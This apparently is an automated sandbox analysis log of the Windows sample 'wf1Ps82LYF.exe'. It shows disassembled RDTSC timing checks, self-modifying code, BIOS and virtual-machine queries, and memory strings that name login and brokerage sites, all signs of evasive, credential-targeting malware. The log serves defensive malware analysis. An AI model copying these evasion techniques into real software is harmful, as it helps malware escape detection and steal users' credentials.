                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AABF82 second address: AABF8C instructions: 0x00000000 rdtsc 0x00000002 js 00007F5D20D3D68Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50506A8 second address: 50506AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50506AE second address: 50506EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D20D3D698h 0x00000009 and ch, 00000038h 0x0000000c jmp 00007F5D20D3D68Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5D20D3D68Bh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50506EC second address: 50506F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50506F0 second address: 50506F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50506F6 second address: 505071C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D20C24769h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 505071C second address: 505077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D20D3D697h 0x00000009 xor cx, 26BEh 0x0000000e jmp 00007F5D20D3D699h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c movzx esi, bx 0x0000001f jmp 00007F5D20D3D695h 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 505077E second address: 5050782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050782 second address: 5050786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050786 second address: 505078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 505078C second address: 50507A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D692h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50507A8 second address: 50507AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50507AC second address: 50507DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, ecx 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F5D20D3D692h 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F5D20D3D68Dh 0x00000016 pop ecx 0x00000017 mov ax, dx 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50507DC second address: 50507F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, 0E4D4923h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50507F5 second address: 50507FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50507FA second address: 5050801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050801 second address: 505081F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 jmp 00007F5D20D3D68Dh 0x0000000d lea eax, dword ptr [ebp-04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 505081F second address: 5050823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050823 second address: 5050829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050829 second address: 505083E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C24761h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 505083E second address: 5050842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50508B1 second address: 50508B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50508B7 second address: 50508BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 505090D second address: 5040022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 299Fh 0x00000007 pushfd 0x00000008 jmp 00007F5D20C24764h 0x0000000d sbb cx, C908h 0x00000012 jmp 00007F5D20C2475Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, esi 0x0000001d jmp 00007F5D20C24766h 0x00000022 pop esi 0x00000023 jmp 00007F5D20C24760h 0x00000028 leave 0x00000029 jmp 00007F5D20C24760h 0x0000002e retn 0004h 0x00000031 nop 0x00000032 cmp eax, 00000000h 0x00000035 setne al 0x00000038 jmp 00007F5D20C24752h 0x0000003a xor ebx, ebx 0x0000003c test al, 01h 0x0000003e jne 00007F5D20C24757h 0x00000040 sub esp, 04h 0x00000043 mov dword ptr [esp], 0000000Dh 0x0000004a call 00007F5D25391D4Bh 0x0000004f mov edi, edi 0x00000051 jmp 00007F5D20C2475Eh 0x00000056 xchg eax, ebp 0x00000057 pushad 0x00000058 call 00007F5D20C2475Eh 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040022 second address: 5040043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov ebx, 14D954C4h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F5D20D3D68Fh 0x00000014 push eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040043 second address: 504008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5D20C2475Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007F5D20C2475Dh 0x00000018 pop ecx 0x00000019 mov edx, 591D37B4h 0x0000001e popad 0x0000001f sub esp, 2Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 mov di, ax 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 504008F second address: 50400B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 jmp 00007F5D20D3D699h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx eax, bx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50400B7 second address: 50400DF instructions: 0x00000000 rdtsc 0x00000002 mov bx, 79BAh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F5D20C2475Ch 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5D20C2475Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50400DF second address: 504011A instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F5D20D3D696h 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5D20D3D697h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040244 second address: 504024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 504024A second address: 5040280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a jmp 00007F5D20D3D692h 0x0000000f jmp 00007F5D20D3D692h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040280 second address: 5040284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040284 second address: 504028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 504039D second address: 504041C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007F5D20C2475Eh 0x00000012 jmp 00007F5D20C24762h 0x00000017 pop ecx 0x00000018 pushfd 0x00000019 jmp 00007F5D20C2475Bh 0x0000001e or si, 423Eh 0x00000023 jmp 00007F5D20C24769h 0x00000028 popfd 0x00000029 popad 0x0000002a lea eax, dword ptr [ebp-2Ch] 0x0000002d jmp 00007F5D20C2475Eh 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 504041C second address: 5040470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F5D20D3D698h 0x0000000b sbb si, E198h 0x00000010 jmp 00007F5D20D3D68Bh 0x00000015 popfd 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push edi 0x0000001a mov di, ax 0x0000001d pop esi 0x0000001e mov edi, 3ED6B712h 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F5D20D3D694h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040470 second address: 5040482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C2475Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040482 second address: 50404F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov cl, 7Dh 0x0000000f mov eax, edx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F5D20D3D698h 0x00000019 pushfd 0x0000001a jmp 00007F5D20D3D692h 0x0000001f sub eax, 78D3AB18h 0x00000025 jmp 00007F5D20D3D68Bh 0x0000002a popfd 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5D20D3D695h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50404F2 second address: 50404F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50404F8 second address: 504051E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5D20D3D694h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 504051E second address: 5040524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 504054B second address: 5040551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040551 second address: 5040571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5D20C24764h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040571 second address: 5040577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040577 second address: 504057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 504057B second address: 5030E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F5D20D3D699h 0x0000000f je 00007F5D9292B73Dh 0x00000015 xor eax, eax 0x00000017 jmp 00007F5D20D16DBAh 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f leave 0x00000020 retn 0004h 0x00000023 nop 0x00000024 xor ebx, ebx 0x00000026 cmp eax, 00000000h 0x00000029 je 00007F5D20D3D7E3h 0x0000002f call 00007F5D2549B8BDh 0x00000034 mov edi, edi 0x00000036 jmp 00007F5D20D3D697h 0x0000003b xchg eax, ebp 0x0000003c jmp 00007F5D20D3D696h 0x00000041 push eax 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F5D20D3D68Dh 0x00000049 adc ecx, 29383C56h 0x0000004f jmp 00007F5D20D3D691h 0x00000054 popfd 0x00000055 popad 0x00000056 xchg eax, ebp 0x00000057 jmp 00007F5D20D3D68Eh 0x0000005c mov ebp, esp 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 pushfd 0x00000062 jmp 00007F5D20D3D68Dh 0x00000067 sub cl, 00000066h 0x0000006a jmp 00007F5D20D3D691h 0x0000006f popfd 0x00000070 mov ebx, ecx 0x00000072 popad 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5030E43 second address: 5030E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5030E49 second address: 5030E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F5D20D3D690h 0x0000000e mov dword ptr [esp], ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5D20D3D697h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040A46 second address: 5040A4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040A4A second address: 5040A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040B69 second address: 5040B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040B6F second address: 5040B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040B73 second address: 5040BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F5D20C24759h 0x0000000d jmp 00007F5D20C24767h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx esi, dx 0x00000019 mov si, dx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5040BA6 second address: 5040C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D698h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F5D20D3D691h 0x00000014 xor ecx, 6901F136h 0x0000001a jmp 00007F5D20D3D691h 0x0000001f popfd 0x00000020 jmp 00007F5D20D3D690h 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 jmp 00007F5D20D3D68Bh 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 jmp 00007F5D20D3D699h 0x00000036 pop eax 0x00000037 jmp 00007F5D20D3D68Eh 0x0000003c call 00007F5D929225BDh 0x00000041 push 76C22B70h 0x00000046 push dword ptr fs:[00000000h] 0x0000004d mov eax, dword ptr [esp+10h] 0x00000051 mov dword ptr [esp+10h], ebp 0x00000055 lea ebp, dword ptr [esp+10h] 0x00000059 sub esp, eax 0x0000005b push ebx 0x0000005c push esi 0x0000005d push edi 0x0000005e mov eax, dword ptr [76C84538h] 0x00000063 xor dword ptr [ebp-04h], eax 0x00000066 xor eax, ebp 0x00000068 push eax 0x00000069 mov dword ptr [ebp-18h], esp 0x0000006c push dword ptr [ebp-08h] 0x0000006f mov eax, dword ptr [ebp-04h] 0x00000072 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000079 mov dword ptr [ebp-08h], eax 0x0000007c lea eax, dword ptr [ebp-10h] 0x0000007f mov dword ptr fs:[00000000h], eax 0x00000085 ret 0x00000086 push eax 0x00000087 push edx 0x00000088 jmp 00007F5D20D3D697h 0x0000008d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50509D2 second address: 5050A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F5D20C24763h 0x0000000c sub ecx, 0698977Eh 0x00000012 jmp 00007F5D20C24769h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F5D20C24763h 0x00000025 pop ecx 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050A2B second address: 5050B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ah 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F5D20D3D696h 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F5D20D3D690h 0x00000016 mov esi, dword ptr [ebp+0Ch] 0x00000019 jmp 00007F5D20D3D690h 0x0000001e test esi, esi 0x00000020 jmp 00007F5D20D3D690h 0x00000025 je 00007F5D9290AFBBh 0x0000002b jmp 00007F5D20D3D690h 0x00000030 cmp dword ptr [76C8459Ch], 05h 0x00000037 pushad 0x00000038 mov esi, 2149D69Dh 0x0000003d pushfd 0x0000003e jmp 00007F5D20D3D68Ah 0x00000043 jmp 00007F5D20D3D695h 0x00000048 popfd 0x00000049 popad 0x0000004a je 00007F5D92923056h 0x00000050 pushad 0x00000051 pushfd 0x00000052 jmp 00007F5D20D3D68Ch 0x00000057 or si, 1658h 0x0000005c jmp 00007F5D20D3D68Bh 0x00000061 popfd 0x00000062 call 00007F5D20D3D698h 0x00000067 mov ecx, 2266AE91h 0x0000006c pop esi 0x0000006d popad 0x0000006e push esp 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 jmp 00007F5D20D3D68Fh 0x00000077 call 00007F5D20D3D698h 0x0000007c pop ecx 0x0000007d popad 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050B38 second address: 5050B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C24767h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050B53 second address: 5050B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050C43 second address: 5050C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050C49 second address: 5050C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D20D3D691h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050C67 second address: 5050C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: 8F7AEE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: A9F492 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: A9DDD0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: AB0D15 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: B2DF72 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe TID: 7752Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe TID: 7796Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485900304.0000000005A84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617099230.0000000000A80000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
